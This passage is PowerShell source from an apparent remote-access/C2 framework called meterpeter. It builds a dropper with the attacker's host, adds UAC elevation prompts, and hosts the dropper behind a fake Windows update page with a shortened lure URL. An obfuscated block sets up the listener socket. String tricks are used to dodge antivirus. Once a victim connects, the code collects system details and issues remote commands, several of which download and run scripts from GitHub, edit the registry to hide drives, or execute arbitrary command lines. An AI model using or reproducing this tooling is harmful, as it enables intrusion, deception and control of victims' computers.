-Path \"$Bin$Dropper_Name.bat\" -Destination \"${Bin}BACKUP.bat\"|Out-Null\r\n ## (ZIP + add LHOST) to drop`per.bat before send it to apache 2 webroot ..\r\n ((Get-Content -Path $Bin$Dropper_Name.bat -Raw) -Replace \"CharlieBrown\",\"$Local_Host\")|Set-Content -Path $Bin$Dropper_Name.bat;\r\n\r\n $RunEXElevated = Read-Host \"[i] Make dropper spawn UAC dialog to run elevated? (y|n)\"\r\n If($RunEXElevated -iMatch '^(y|yes)$')\r\n {\r\n\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Execute Batch with administrator privileges?\r\n\r\n .NOTES\r\n This function add's a cmdline to the beggining of bat file that uses\r\n 'Net Session' API to check for admin privs before executing powershell\r\n -ru`nas on current process spawning a UAC dialogbox of confirmation.\r\n #>\r\n\r\n $MyRunes = \"r\" + \"una\" + \"s\" -join ''\r\n #TODO: run bat with admin privs ??? -> requires LanManServer (server) service active\r\n ((Get-Content -Path $Bin$Dropper_Name.bat -Raw) -Replace \"@echo off\",\"@echo off`nsc query `\"lanmanserver`\"|find `\"RUNNING`\" >nul`nif %ERRORLEVEL% EQU 0 (`n Net session >nul 2>&1 || (PowerShell start -verb $MyRunes '%~0' &exit /b)`n)\")|Set-Content -Path $Bin$Dropper_Name.bat\r\n }\r\n\r\n Compress-Archive -LiteralPath $Bin$Dropper_Name.bat -DestinationPath $APACHE$Dropper_Name.zip -Force;\r\n #Revert original BAT to default to be used again\r\n Remove-Item -Path \"$Bin$Dropper_Name.bat\" -Force\r\n Copy-Item -Path \"${Bin}BACKUP.bat\" -Destination \"$Bin$Dropper_Name.bat\"|Out-Null\r\n Remove-Item -Path \"${Bin}BACKUP.bat\" -Force\r\n\r\n }\r\n\r\n\r\n #write onscreen\r\n write-Host \"[i] Send the URL generated to target to trigger download.\"\r\n Copy-Item -Path \"${IPATH}\\Mimiratz\\theme\\Catalog.png\" -Destination \"${APACHE}Catalog.png\"|Out-Null\r\n Copy-Item -Path \"${IPATH}\\Mimiratz\\theme\\favicon.png\" -Destination \"${APACHE}favicon.png\"|Out-Null\r\n Copy-Item -Path \"${IPATH}\\Mimiratz\\theme\\Update-KB5005101.html\" -Destination \"${APACHE}Update-KB5005101.html\"|Out-Null\r\n ((Get-Content -Path \"${APACHE}Update-KB5005101.html\" -Raw) -Replace \"henrythenavigator\",\"$Dropper_Name\")|Set-Content -Path \"${APACHE}Update-KB5005101.html\"\r\n\r\n Write-Host \"[i] Attack Vector: http://$Local_Host/$Dropper_Name.html\" -ForeGroundColor Black -BackGroundColor white;\r\n\r\n #Shorten Url function\r\n $Url = \"http://$Local_Host/$Dropper_Name.html\"\r\n $tinyUrlApi = 'http://tinyurl.com/api-create.php'\r\n $response = Invoke-WebRequest (\"{0}?url={1}\" -f $tinyUrlApi, $Url)\r\n $response.Content|Out-File -FilePath \"$Env:TMP\\sHORTENmE.meterpeter\" -Force\r\n $GetShortenUrl = Get-Content -Path \"$Env:TMP\\sHORTENmE.meterpeter\"\r\n Write-Host \"[i] Shorten Uri : $GetShortenUrl\" -ForeGroundColor Black -BackGroundColor white\r\n Remove-Item -Path \"$Env:TMP\\sHORTENmE.meterpeter\" -Force\r\n\r\n}\r\n$check = $Null;\r\n$python_port = $Null;\r\n$Server_port = $Null;\r\n$Python_version = $Null;\r\n## End of venom function\r\n\r\n\r\nIf($RunEXElevated -iMatch '^(y|yes)$')\r\n{\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Add UAC elevation to payload.ps1\r\n\r\n .NOTES\r\n This migth trigger av detection on payload (danger)\r\n @Ahmed_Ben_Mhamed uses the payload.PS1 of meterpeter C2\r\n to expl`oit targets over WAN networks, but UAC elevation\r\n its only available by default in drop`pers. (untill now) \r\n #>\r\n\r\n $OLD = (Get-Content -Path \"${IPATH}${payload_name}.ps1\" -Raw)\r\n echo \"`$Bi0s = (`\"#Ru`\"+`\"nA#s`\" -Join '') -replace '#',''\" > \"${IPATH}${payload_name}.ps1\"\r\n echo \"If(-not([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))\" >> \"${IPATH}${payload_name}.ps1\"\r\n echo \"{\" >> \"${IPATH}${payload_name}.ps1\"\r\n echo \" Start-Process -WindowStyle hidden powershell.exe `\"-File`\",('`\"{0}`\"' -f `$MyInvocation.MyCommand.Path) -Verb `$Bi0s\" >> \"${IPATH}${payload_name}.ps1\"\r\n echo \" exit\" >> \"${IPATH}${payload_name}.ps1\"\r\n echo \"}`n\" >> \"${IPATH}${payload_name}.ps1\"\r\n echo \"$OLD\" >> \"${IPATH}${payload_name}.ps1\"\r\n}\r\n\r\n\r\n$ola = 'Creat' + 'eInstance' -join ''\r\n$Bytes = [System.Byte[]]::$ola([System.Byte],1024);\r\nWrite-Host \"[*] Listening on LPort: $Local_Port tcp\";\r\n\r\n## $Socket - Obfuscat`ion\r\n${/$.}=+$( ) ; ${).!} =${/$.} ;${#~} = ++ ${/$.} ; ${[/} =( ${/$.} =${/$.} + ${#~} ) ;${.-} = ( ${/$.} =${/$.}+ ${#~} ); ${.$)}= (${/$.} = ${/$.} +${#~} ) ;${/@} = (${/$.} =${/$.}+${#~} ) ;${)/}=(${/$.}=${/$.}+${#~} ) ; ${#-*} =( ${/$.}= ${/$.}+ ${#~});${;}= (${/$.} =${/$.}+ ${#~} ) ;${``[@} = (${/$.} = ${/$.}+${#~} ) ;${[}= \"[\" + \"$( @{} ) \"[${#-*}]+ \"$(@{ })\"[ \"${#~}\" + \"${``[@}\"]+\"$( @{} ) \"[\"${[/}\" + \"${).!}\"]+ \"$?\"[${#~} ] + \"]\" ;${/$.} = \"\".(\"$(@{ }) \"[ \"${#~}${.$)}\"]+\"$(@{ })\"[\"${#~}${)/}\"]+\"$( @{ } ) \"[ ${).!} ] +\"$( @{ }) \"[${.$)}] +\"$? \"[${#~} ]+\"$( @{}) \"[${.-}] ) ; ${/$.}= \"$( @{ } ) \"[\"${#~}\"+ \"${.$)}\"] + \"$( @{}) \"[ ${.$)} ] +\"${/$.}\"[ \"${[/}\" +\"${#-*}\"] ;&${/$.} (\" ${/$.} (${[}${.-}${)/}+ ${[}${;}${.-}+ ${[}${#~}${#~}${#~}+${[}${``[@}${``[@} + ${[}${#~}${).!}${#-*}+ ${[}${#~}${).!}${#~}+${[}${#~}${#~}${)/}+${[}${.-}${[/}+ ${[}${)/}${#~} +${[}${.-}${[/}+${[}${#-*}${;} +${[}${#~}${).!}${#~} +${[}${#~}${#~}${``[@}+ ${[}${.$)}${/@}+${[}${#-*}${``[@}+ ${[}${``[@}${;}+ ${[}${#~}${).!}${)/} +${[}${#~}${).!}${#~} + ${[}${``[@}${``[@} +${[}${#~}${#~}${)/} +${[}${.-}${[/} +${[}${;}${.-}+${[}${#~}${[/}${#~} +${[}${#~}${#~}${/@}+${[}${#~}${#~}${)/} +${[}${#~}${).!}${#~}+ ${[}${#~}${).!}${``[@} + ${[}${.$)}${)/} + ${[}${#-*}${;} + ${[}${#~}${).!}${#~}+ ${[}${#~}${#~}${)/} + ${[}${.$)}${)/}+ ${[}${;}${.-} + ${[}${#~}${#~}${#~}+${[}${``[@}${``[@}+${[}${#~}${).!}${#-*}+ ${[}${#~}${).!}${#~} + ${[}${#~}${#~}${)/} +${[}${#~}${#~}${/@} +${[}${.$)}${)/} + ${[}${;}${.$)} +${[}${``[@}${``[@} + ${[}${#~}${#~}${[/}+ ${[}${#-*}${)/}+ ${[}${#~}${).!}${/@}+${[}${#~}${#~}${/@} + ${[}${#~}${#~}${)/}+${[}${#~}${).!}${#~} +${[}${#~}${#~}${).!} + ${[}${#~}${).!}${#~} +${[}${#~}${#~}${.$)} + ${[}${.$)}${).!}+${[}${.-}${``[@} +${[}${.$)}${;}+${[}${.$)}${)/} +${[}${.$)}${;} +${[}${.$)}${)/} + ${[}${.$)}${;} + ${[}${.$)}${)/}+ ${[}${.$)}${;} + ${[}${.-}${``[@} +${[}${.$)}${.$)} + ${[}${.-}${)/}+ ${[}${#-*}${)/}+${[}${#~}${#~}${#~}+ ${[}${``[@}${``[@}+${[}${``[@}${#-*} +${[}${#~}${).!}${;}+ ${[}${``[@}${/@} +${[}${;}${).!} +${[}${#~}${#~}${#~} +${[}${#~}${#~}${.$)}+${[}${#~}${#~}${)/} + ${[}${.$)}${#~} +${[}${/@}${``[@} )\")\r\n\r\n$Socket.Start();\r\n$Client = $Socket.AcceptTcpClient();\r\n$Remote_Host = $Client.Client.RemoteEndPoint.Address.IPAddressToString\r\nWrite-Host \"[-] Beacon received: \" -ForegroundColor Green -NoNewline\r\nWrite-Host \"$Remote_Host\" -ForegroundColor Red\r\n\r\n\r\n## Connection Banner\r\n$ConnectionBanner = @\"\r\n\r\n _____________ _____________\r\n |.-----------.| |.-----------.|\r\n || || || ||\r\n || Local || <==> || Remote || \r\n ||___________|| ||___________||\r\n __'---------'__ __'---------'__\r\n [:::: ::::::::::] [:::::::::: ::::]\r\n\"@;\r\nwrite-host $ConnectionBanner\r\nwrite-host \" $Local_Host\" -ForegroundColor Green -NoNewline\r\nwrite-host \" $Remote_Host`n\" -ForegroundColor Red\r\n\r\n\r\n#Play sound on session creation\r\n$PlayWav = New-Object System.Media.SoundPlayer\r\n$PlayWav.SoundLocation = \"${IPATH}\\Mimiratz\\theme\\ConnectionAlert.wav\"\r\n$PlayWav.playsync();\r\n\r\n$Stream = $Client.GetStream();\r\n$WaitData = $False;\r\n$Info = $Null;\r\n\r\n$RhostWorkingDir = Char_Obf(\"(Get-location).Path\");\r\n$Processor = Char_Obf(\"(Get-WmiObject Win32_processor).Caption\");\r\n$Name = Char_Obf(\"(Get-WmiObject Win32_OperatingSystem).CSName\");\r\n$System = Char_Obf(\"(Get-WmiObject Win32_OperatingSystem).Caption\");\r\n$Version = Char_Obf(\"(Get-WmiObject Win32_OperatingSystem).Version\");\r\n$serial = Char_Obf(\"(Get-WmiObject Win32_OperatingSystem).SerialNumber\");\r\n$syst_dir = Char_Obf(\"(Get-WmiObject Win32_OperatingSystem).SystemDirectory\");\r\n$Architecture = Char_Obf(\"(Get-WmiObject Win32_OperatingSystem).OSArchitecture\");\r\n$WindowsDirectory = Char_Obf(\"(Get-WmiObject Win32_OperatingSystem).WindowsDirectory\");\r\n$RegisteredUser = Char_Obf(\"(Get-CimInstance -ClassName Win32_OperatingSystem).RegisteredUser\");\r\n$BootUpTime = Char_Obf(\"(Get-CimInstance -ClassName Win32_OperatingSystem).LastBootUpTime.ToString()\");\r\n\r\n#Sysinfo command at first time run (connection)\r\n$Command = \"cd `$Env:TMP;`\" DomainName : `\"+$Name+`\"``n Architecture : `\"+$Architecture+`\"``n RemoteHost : `\"+`\"$Remote_Host`\"+`\"``n BootUpTime : `\"+$BootUpTime+`\"``n RegisteredUser : `\"+$RegisteredUser+`\"``n OP System : `\"+$System+`\"``n OP Version : `\"+$Version+`\"``n SystemDir : `\"+$syst_dir+`\"``n WorkingDir : `\"+$RhostWorkingDir+`\"``n ProcessorCPU : `\"+$Processor;If(Get-Process wscript -EA SilentlyContinue){Stop-Process -Name wscript -Force}\";\r\n\r\n\r\nWhile($Client.Connected)\r\n{\r\n If(-not ($WaitData))\r\n {\r\n If(-not ($Command))\r\n {\r\n $Flipflop = \"False\";\r\n Write-Host \"`n - press 'Enter' to continue ..\" -NoNewline;\r\n $continue = Read-Host;\r\n Clear-Host;\r\n Write-Host $Modules;\r\n Write-Host \"`n :meterpeter> \" -NoNewline -ForeGroundColor Green;\r\n $Command = Read-Host;\r\n }\r\n\r\n\r\n If($Command -ieq \"Modules\")\r\n {\r\n Clear-Host;\r\n Write-Host \"`n$Modules\";\r\n $Command = $Null;\r\n }\r\n\r\n If($Command -ieq \"Info\")\r\n {\r\n Write-Host \"`n`n$Info\";\r\n $Command = $Null;\r\n }\r\n\r\n If($Command -ieq \"Session\")\r\n {\r\n ## Check if client (target machine) is still connected ..\r\n $ParseID = \"$Local_Host\"+\":\"+\"$Local_Port\" -Join ''\r\n $SessionID = netstat -ano | Select-String \"$ParseID\" | Select-Object -First 1\r\n $AllSettings = Get-NetAdapter | Select-Object * | Where-Object { $_.Status -iMatch '^(Up)$' }\r\n $Netdesc = ($AllSettings).InterfaceDescription\r\n $NetSped = ($AllSettings).LinkSpeed\r\n $NetAdpt = ($AllSettings).Name\r\n\r\n write-host \"`n`n Connection : \" -NoNewline;\r\n write-host \"$NetAdpt\" -ForegroundColor DarkGray -NoNewline;\r\n write-host \" LinkSpeed: \" -NoNewline;\r\n write-host \"$NetSped\" -ForegroundColor DarkGray\r\n write-host \" Description: \" -NoNewline\r\n write-host \"$Netdesc\" -ForegroundColor Red\r\n\r\n Write-Host \"`n Proto Local Address Foreign Address State PID\" -ForeGroundColor green;\r\n Write-Host \" ----- ------------- --------------- ----- ---\";\r\n ## Display connections statistics\r\n If(-not($SessionID) -or $SessionID -eq \" \")\r\n {\r\n Write-Host \" None Connections found (Client Disconnected)\" -ForeGroundColor Red\r\n } Else {\r\n Write-Host \" $SessionID\"\r\n }\r\n\r\n write-host \"\"\r\n $Command = $Null;\r\n }\r\n\r\n If($Command -ieq \"Pranks\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" Remote pranks manager\";\r\n write-host \"`n`n Modules Description\" -ForegroundColor green;\r\n write-host \" ------- -----------\";\r\n write-host \" Msgbox Spawn remote msgbox manager\";\r\n write-host \" Speak Make remote host speak one frase\";\r\n write-host \" OpenUrl Open\\spawn URL in default browser\";\r\n write-host \" GoogleX Browser google easter eggs manager\";\r\n write-host \" WindowsUpdate Fake windows update full screen prank\";\r\n write-host \" CriticalError Prank that fakes a critical system error\";\r\n write-host \" BallonTip Show a ballon tip in the notification bar\";\r\n write-host \" Nodrives Hide All Drives (C:D:E:F:G) From Explorer\";\r\n write-host \" LabelDrive Rename drive letter (C:) label From Explorer\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow\r\n write-host \"`n`n :meterpeter:Pranks> \" -NoNewline -ForeGroundColor Green;\r\n $choise = Read-Host;\r\n If($choise -ieq \"BallonTip\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow\r\n write-host \" This module spawn a ballontip in the notification bar\"\r\n write-host \" Parameter IconType accepts values: Info,Warning,Error\"\r\n write-host \" Parameter CloseTime accepts milliseconds (example: 10000)\"\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green\r\n write-host \" ------- ----------- -------------------\"\r\n write-host \" Spawn ballontip in notification bar UserLand\"\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow\r\n write-host \"`n`n :meterpeter:Pranks:BallonTip> \" -NoNewline -ForeGroundColor Green\r\n $Prank_choise = Read-Host;\r\n If($Prank_choise -ieq \"Spawn\")\r\n {\r\n write-host \" - BallonTip Title : \" -NoNewline\r\n $Title = Read-Host\r\n If([string]::IsNullOrEmpty($Title))\r\n {\r\n $Title = \"Attention `$Env:USERNAME\"\r\n write-host \" => Error: wrong input, default to: '$Title'\" -ForegroundColor Red\r\n }\r\n\r\n write-host \" - BallonTip Text : \" -NoNewline\r\n $Text = Read-Host\r\n If([string]::IsNullOrEmpty($Text))\r\n {\r\n $Text = \"A vir`us has detected in `$Env:COMPUTERNAME\"\r\n write-host \" => Error: wrong input, default to: '$Text'\" -ForegroundColor Red\r\n }\r\n\r\n write-host \" - BallonTip IconType : \" -NoNewline\r\n $IconType = Read-Host\r\n If([string]::IsNullOrEmpty($IconType))\r\n {\r\n $IconType = \"Warning\"\r\n write-host \" => Error: wrong input, default to: '$IconType'\" -ForegroundColor Red\r\n }\r\n\r\n write-host \" - BallonTip CloseTime : \" -ForegroundColor DarkYellow -NoNewline\r\n $CloseTime = Read-Host\r\n If([string]::IsNullOrEmpty($CloseTime))\r\n {\r\n $CloseTime = \"10000\"\r\n write-host \" => Error: wrong input, default to: '$CloseTime'\" -ForegroundColor Red\r\n }\r\n\r\n write-host \" * Spawn a ballontip in the notification bar ..\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n $Command = \"cd `$Env:TMP;iwr -Uri 'https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Misc-CmdLets/Show-BalloonTip.ps1' -OutFile 'Show-BalloonTip.ps1'|Unblock-File;powershell -file `$Env:TMP\\Show-BalloonTip.ps1 -title `\"$Title`\" -text `\"$Text`\" -icontype `\"$IconType`\" -autoclose `\"$CloseTime`\";Remove-Item -Path `$Env:TMP\\Show-BalloonTip.ps1 -Force\"\r\n }\r\n If($Prank_choise -ieq \"Return\" -or $Prank_choise -ieq \"cls\" -or $Prank_choise -ieq \"modules\" -or $Prank_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $Prank_choise = $Null;\r\n } \r\n }\r\n If($choise -ieq \"WindowsUpdate\" -or $choise -ieq \"WU\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow\r\n write-host \" This module opens the target default web browser in fakeupdate.net\"\r\n write-host \" in full screen mode. Faking that one windows update its occuring.\"\r\n write-host \" Remark: Target requires to press F11 to exit full screen prank.\" -ForegroundColor Yellow\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- -------------------\";\r\n write-host \" Start execute prank in background UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow\r\n write-host \"`n`n :meterpeter:Pranks:WU> \" -NoNewline -ForeGroundColor Green;\r\n $Prank_choise = Read-Host;\r\n If($Prank_choise -ieq \"Start\")\r\n {\r\n write-host \" * Faking windows system update ..`n\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n $Command = \"powershell cd `$Env:TMP;iwr -Uri 'https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/FWUprank.ps1' -OutFile 'FWUprank.ps1'|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList '-file FWUprank.ps1 -autodelete on';echo ' `> Windows system update prank running in background!' `> trash.mtp;echo ' `> URI: https://fakeupdate.net/[SystemOS]/~{F11}' `>`> trash.mtp;Get-Content trash.mtp;Remove-Item trash.mtp -Force\"\r\n }\r\n If($Prank_choise -ieq \"Return\" -or $Prank_choise -ieq \"cls\" -or $Prank_choise -ieq \"modules\" -or $Prank_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $Prank_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"LabelDrive\" -or $choise -ieq \"Label\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" Module to rename drive label\";\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- -------------------\";\r\n write-host \" List ALL drives available UserLand\" \r\n write-host \" Rename Rename drive letter label \" -NoNewline;\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Pranks:Label> \" -NoNewline -ForeGroundColor Green;\r\n $choise_two = Read-Host;\r\n If($choise_two -ieq \"List\")\r\n {\r\n write-host \" * Listing all drives available ..\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"`n\";\r\n $Command = \"`$PSVERSION = (`$Host).version.Major;If(`$PSVERSION -gt 5){Get-PSDrive -PSProvider 'FileSystem'|Select-Object Root,CurrentLocation,Used,Free|ft|Out-File dellog.txt}Else{Get-Volume|Select-Object DriveLetter,FileSystemLabel,FileSystemType,DriveType,HealthStatus,SizeRemaining,Size|FT|Out-File dellog.txt};Get-Content dellog.txt;Remove-Item dellog.txt -Force\";\r\n }\r\n If($choise_two -ieq \"Rename\")\r\n {\r\n $MyDrive = Read-Host \" - DriveLetter to change the label (C)\"\r\n $MyDName = Read-Host \" - Drive new Friendly Name (Armagedon)\"\r\n write-host \" * Rename Drive ${MyDrive}: label to [\" -ForegroundColor Green -NoNewline\r\n write-host \"$MyDName\" -ForegroundColor Red -NoNewline;\r\n write-host \"]\" -ForegroundColor Green;\r\n \r\n Start-Sleep -Seconds 1;write-host \"`n\";\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){If(-not(Test-Path -Path `\"${MyDrive}:`\")){echo `\" [${MyDrive}:] Drive letter not found ..``n`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force}Set-Volume -DriveLetter $MyDrive -NewFileSystemLabel `\"$MyDName`\";Start-Sleep -Seconds 1;Get-Volume -DriveLetter $MyDrive|Select-Object DriveLetter,FileSystemLabel,FileSystemType,HealthStatus,SizeRemaining,Size|FT}Else{echo `\" [i] Client Admin Privileges Required (run as administrator)``n`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force}\";\r\n }\r\n If($choise_two -ieq \"Return\" -or $choise_two -ieq \"cls\" -or $choise_two -ieq \"Modules\" -or $choise_two -ieq \"clear\")\r\n {\r\n $Command = $Null;\r\n $choise_two = $Null;\r\n }\r\n }\r\n If($choise -ieq \"Nodrives\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" Module to enable\\disable the display of drivers\";\r\n write-host \" under Explorer (modify Explorer HKCU policy key)\";\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- -------------------\";\r\n write-host \" Disable Hide Drives from explorer \" -NoNewline;\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" Enable Show Drives in Explorer \" -NoNewline;\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Pranks:NoDrives> \" -NoNewline -ForeGroundColor Green;\r\n $choise_two = Read-Host;\r\n If($choise_two -ieq \"Disable\" -or $choise_two -ieq \"off\")\r\n {\r\n write-host \" * Hide All Drives (C:D:E:F:G) From Explorer ..\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"`n`n\";\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){cmd /R reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f;Get-ItemProperty -path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer' -Name 'NoDrives' | select-Object NoDrives,PSchildName,PSDrive,PSProvider | Format-Table -AutoSize `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force;cmd /R taskkill /F /IM explorer.exe;start explorer.exe}else{echo `\" [i] Client Admin Privileges Required (run as administrator)`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force}\";\r\n }\r\n If($choise_two -ieq \"Enable\" -or $choise_two -ieq \"on\")\r\n {\r\n write-host \" * Display All Drives (C:D:E:F:G) In Explorer ..\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"`n`n\";\r\n $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){Remove-Itemproperty -path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer' -Name 'NoDrives' -Force;Get-Item -path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer' `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force;cmd /R taskkill /F /IM explorer.exe;start explorer.exe}else{echo `\" [i] Client Admin Privileges Required (run as administrator)`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force}\";\r\n }\r\n If($choise_two -ieq \"Return\" -or $choise_two -ieq \"cls\" -or $choise_two -ieq \"Modules\" -or $choise_two -ieq \"clear\")\r\n {\r\n $Command = $Null;\r\n $choise_two = $Null;\r\n }\r\n }\r\n If($choise -ieq \"CriticalError\")\r\n {\r\n $MaxInteractions = Read-Host \" - How many times to loop prank? (8) \"\r\n $DelayTime = Read-Host \" - The delay time between loops? (9) \"\r\n\r\n If([string]::IsNullOrEmpty($DelayTime)){$DelayTime = \"9\"}\r\n If([string]::IsNullOrEmpty($MaxInteractions)){$MaxInteractions = \"8\"}\r\n\r\n Write-Host \" * Faking a critical system error (BSOD)\" -ForegroundColor Green\r\n Write-Host \" => Takes aprox 30 seconds to run`n`n\" -ForegroundColor DarkYellow\r\n\r\n write-host \" > Executing BSOD prank in background.\" -ForegroundColor Green\r\n write-host \" > MaxInteractions:\" -NoNewline\r\n write-host \"$MaxInteractions\" -ForegroundColor Red -NoNewline\r\n write-host \" DelayTime:\" -NoNewline\r\n write-host \"$DelayTime\" -ForegroundColor Red -NoNewline\r\n write-host \" (sec)`n\"\r\n\r\n #Execute remote command\r\n $Command = \"powershell cd `$Env:TMP;iwr -Uri 'https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/C2Prank.ps1' -OutFile 'C2Prank.ps1'|Unblock-File;Start-Process -windowstyle hidden powershell -ArgumentList '-file C2Prank.ps1 -MaxInteractions $MaxInteractions -DelayTime $DelayTime'\"\r\n }\r\n If($choise -ieq \"msgbox\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow\r\n write-host \" This module allow attacker to spawn a simple msgbox that auto-closes\"\r\n write-host \" after a certain amount of pre-selected time, or spawn a msgbox that\"\r\n write-host \" waits for comfirmation (press yes button on msgbox) to execute cmdline\"\r\n write-host \" Remark: The msgbox 'auto-close time' its set in seconds\" -ForegroundColor Yellow\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- -------------------\";\r\n write-host \" simple Spawn simple msgbox UserLand\";\r\n write-host \" cmdline msgbox that exec cmdline UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow\r\n write-host \"`n`n :meterpeter:Pranks:Msgbox> \" -NoNewline -ForeGroundColor Green;\r\n $msgbox_choise = Read-Host;\r\n If($msgbox_choise -ieq \"Simple\")\r\n {\r\n Write-Host \" * Spawn simple remote msgbox\" -ForegroundColor Green\r\n $MsgBoxClose = Read-Host \" - Msgbox auto-close time\"\r\n If(-not($MsgBoxClose) -or $MsgBoxClose -ieq $null)\r\n {\r\n $MsgBoxClose = \"10\"\r\n Write-Host \" => Error: wrong input, set demo to '$MsgBoxClose'\" -ForegroundColor Red\r\n }\r\n\r\n $MsgBoxTitle = Read-Host \" - Input the msgbox title\"\r\n If(-not($MsgBoxTitle) -or $MsgBoxTitle -ieq $null)\r\n {\r\n $MsgBoxTitle = \"MeterpeterC2\"\r\n Write-Host \" => Error: wrong input, set demo to '$MsgBoxTitle'\" -ForegroundColor Red\r\n }\r\n\r\n $MsgBoxText = Read-Host \" - Input text to display \"\r\n If(-not($MsgBoxText) -or $MsgBoxText -ieq $null)\r\n {\r\n $MsgBoxText = \"Executing message box ..\"\r\n Write-Host \" => Error: wrong input, set demo to '$MsgBoxText'\" -ForegroundColor Red\r\n }\r\n\r\n Write-Host \"`n`n > Executing simple messagebox remote ..`n\"\r\n $Command = \"powershell (New-Object -ComObject Wscript.Shell).Popup(`\"$MsgBoxText`\",$MsgBoxClose,`\"$MsgBoxTitle`\",4+64)|Out-Null\"\r\n }\r\n If($msgbox_choise -ieq \"cmdline\")\r\n {\r\n $MsgBoxClose = Read-Host \" - Msgbox auto-close time\"\r\n If(-not($MsgBoxClose) -or $MsgBoxClose -ieq $null)\r\n {\r\n $MsgBoxClose = \"10\"\r\n Write-Host \" => Error: wrong input, set demo to '$MsgBoxClose'\" -ForegroundColor Red\r\n }\r\n\r\n $MsgBoxTitle = Read-Host \" - Input the msgbox title\"\r\n If(-not($MsgBoxTitle) -or $MsgBoxTitle -ieq $null)\r\n {\r\n $MsgBoxTitle = \"MeterpeterC2\"\r\n Write-Host \" => Error: wrong input, set demo to '$MsgBoxTitle'\" -ForegroundColor Red\r\n }\r\n\r\n $MsgBoxText = Read-Host \" - Input text to display \"\r\n If(-not($MsgBoxText) -or $MsgBoxText -ieq $null)\r\n {\r\n $MsgBoxText = \"Executing command\"\r\n Write-Host \" => Error: wrong input, set demo to '$MsgBoxText'\" -ForegroundColor Red\r\n }\r\n\r\n $MsgBoxAppli = Read-Host \" - PS Cmdline to execute \"\r\n If(-not($MsgBoxAppli) -or $MsgBoxAppli -ieq $null)\r\n {\r\n $MsgBoxAppli = \"cmd /R start calc.exe\"\r\n Write-Host \" => Error: wrong input, set demo to '$MsgBoxAppli'\" -ForegroundColor Red\r\n }\r\n\r\n Write-Host \" * Spawn msgbox that exec cmdline\" -ForegroundColor Green\r\n $Command = \"[int]`$MymsgBox = powershell (New-Object -ComObject Wscript.Shell).Popup(`\"$MsgBoxText`\",$MsgBoxClose,`\"$MsgBoxTitle`\",4+64);If(`$MymsgBox -eq 6){echo `\"$MsgBoxAppli`\"|&('Sex' -replace 'S','I');echo `\"`n `> Command '$MsgBoxAppli' executed.`\"|Out-File msglogfile.log}Else{echo `\"`n `> Fail to execute '$MsgBoxAppli' command.`\"|Out-File msglogfile.log};Get-Content -Path msglogfile.log;Remove-Item -Path msglogfile.log -Force\"\r\n }\r\n If($msgbox_choise -ieq \"Return\" -or $msgbox_choise -ieq \"cls\" -or $msgbox_choise -ieq \"modules\" -or $msgbox_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $msgbox_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"Speak\")\r\n {\r\n write-host \"`n`n 